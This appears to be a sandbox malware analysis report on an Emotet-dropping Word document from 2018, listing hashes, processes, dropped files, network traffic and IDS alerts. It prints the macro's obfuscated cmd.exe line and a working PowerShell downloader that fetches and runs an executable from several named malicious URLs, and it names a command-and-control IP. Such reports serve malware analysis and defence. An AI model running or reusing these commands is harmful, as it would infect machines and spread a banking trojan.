File name: | Untitled-ALX-L554955.doc |
Full analysis: | https://app.any.run/tasks/6484a87b-46b6-47b2-89ae-3a560cc4660b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 08:05:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Cooper, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 05:31:00 2018, Last Saved Time/Date: Wed Nov 14 05:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 7D24DB05104C6C2B3CEDAA14DCE6DBA5 |
SHA1: | 7B31BF78A1C38413449D658E61C7A90A1783240F |
SHA256: | 77339DE74BB03979053CE0ADA65C9C4EB37A720304EEB581B99D92835F21B7B3 |
SSDEEP: | 1536:qjkqGO5ocn1kp59gxBK85fBt+a9Ky4z4He519y9ZjFz4AZUEJ:P41k/W48ez4He519y9ZjFz4AZUc |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Cooper |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 05:31:00 |
ModifyDate: | 2018:11:14 05:31:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3128 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-ALX-L554955.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2648 | cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,^4^1,6^9,^60,^5^0,5^2,^5^0^,6^9^,^68,6^9,^7,52,^1^4^,1^8,51^,^3^,51,0^,^1^8^,5^2^,^34^,^13,4^3,4^6^,^38,6^2,5^1,5^1,^32,^70,^3^,3,51,^6^0,^6^9,7,68^,^4^0^,^69,4^1,^3^2,^2^,7^,^58^,1^4^,^50^,5^2^,^41^,3^,36^,5^4,4^0,^39,^8,^48,0^,5^9^,19,38,^6^2^,51^,5^1,^3^2^,^70^,^3^,^3,^4^1,2,1^0,6^9^,^7^,66,^6^9,^6^8,7^1^,^68^,3^6,^6^0,^21,^1^8^,5^0^,18^,^52^,6^8^,69,7^1,^69,40,^69^,^14^,50^,52,4^1,^3,^12^,^2^1^,44^,^3^2^,^37,^1^3,^10,1^8,50^,6^,^1^5^,14^,^4^3^,^32^,40,18,^5^1^,^2^5,^1^5^,^38,1^5^,3^5,47^,31^,^48,^67^,^60,6^5,^25^,4^,^43,71,^68^,^5^1,3^6^,^41^,^14^,6^1^,^5^9,1^4^,^20^,^69^,^5^1^,^62,^4^5,^70^,70^,^22,^36^,^51,3^7^,36^,^41,^3^2,20^,^6^9^,^5^1^,6^2^,2^5,^3^5^,3^0^,^1^5^,2^9,^39^,5^,7,^1^4^,^3^6^,2^4,36,^1^5^,3^5,4^7,^31,^5^0,50^,8^,2^7,6^5^,1^6^,3^6^,42^,2^8^,^5^9,2^6,46,^36,^5^0^,^51^,^27^,2^8,5^0,5^2^,^4^1^,^27,^1^5^,^4^1,68,2^4,^4^1^,40,^54,14^,24,41^,^40,^6^2,51,51,^32,^1^5^,4^7,3^1,32,^1^7^,^37^,2^7,65^,^27,^1^6^,36^,^4^2^,^28,5^9,^26^,46,^36^,5^0,^51,^27^,^28,^50,^52,41,2^7,^15^,^6^9,^1^0^,^52^,1^0,26^,^1^4,68,51,^60^,^3^6,6^9^,^4^1,15^,^47^,^9^,^5^2,^6^0^,^36^,^69^,50^,^6^2^,25^,3^1^,^26,3^2,67^,2^7,^1^8,^7,2^7,31^,^18^,8^,^0^,3^5^,57^,^5^1^,^60,71^,^57^,31,^5^0^,^50^,8,1^4^,^5^2^,3^2,3^6,7,^2^5,^15^,^2^2,64,3^7,1^5,49,^3^1,26^,^32,^67^,^49^,1^,35^,^4^7^,^31,50^,50^,8,^14,68,36^,7,1^0,2^5^,^35,47,3^1^,32,^1^7^,^37^,^1^4,^52,3^2,^3^6,7,^25,^35,^47,31^,3^2^,17,3^7^,14^,^5^1,^71^,^3^2,^36,^27^,6^5,^27^,^56,47,^3^1^,^3^2,^1^7,^37,^1^4^,4^2^,60,^1^8,^51^,^36^,^25,3^1,^50,^5^0,8^,14,60^,36,^6^8,32,52^,7^,6^8^,^3^6^,3^3^,^52^,^10^,^71,35,4^7^,31^,^32^,1^7,^3^7^,14,6^8^,^6^9^,^2^1,^36^,51^,5^2,^9^,1^8,^4^0^,^36,^2^5,^31,48,67,^60^,3^5^,^4^7^,4^3^,51^,69^,^60^,5^1,^28,2^0^,60,52^,^5^0,36,68^,^6^8^,^27^,3^1^,^4^8,6^7^,6^0^,4^7^,26^,6^0^,36^,69^,13,^23,5^0,6^9,^5^1,^50^,^6^2,5^7^,^23,2^3,27^,^2^7^,^27,^2^7,^27,27^,2^7^,^2^7,27^,^27^,2^7^,^2^7^,^27,2^7^,^2^7^,^2^7^,^27,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
456 | powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');$qWr=([System.IO.Path]::GetTempPath()+'\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2784 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3232 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | JZn.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2860 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | JZn.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3812 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7E4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LEV1RF3CK4J37XG2MUG7.temp | — | |
MD5:— | SHA256:— | |||
3128 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db60d.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3232 | JZn.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:83993DA32B060C07475CFED5AB9B03AA | SHA256:951F1946669138459A5185EA594D13FA358486CF05DAAB305D4174C1A1CF0579 | |||
456 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JZn.exe | executable | |
MD5:83993DA32B060C07475CFED5AB9B03AA | SHA256:951F1946669138459A5185EA594D13FA358486CF05DAAB305D4174C1A1CF0579 | |||
3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$titled-ALX-L554955.doc | pgc | |
MD5:D6E7E98109B06CB493D6D249055BBDA1 | SHA256:F42C6494F1F4B4BEE66B03459FFC46FFD13168EC3611AB0DB9ED8414EF245028 | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3812 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
456 | powershell.exe | GET | 200 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH/ | VN | executable | 448 Kb | malicious |
456 | powershell.exe | GET | 301 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH | VN | html | 617 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3812 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
456 | powershell.exe | 45.252.248.22:80 | stud100.biz | AZDIGI Corporation | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
stud100.biz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
456 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
456 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
456 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
456 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
456 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |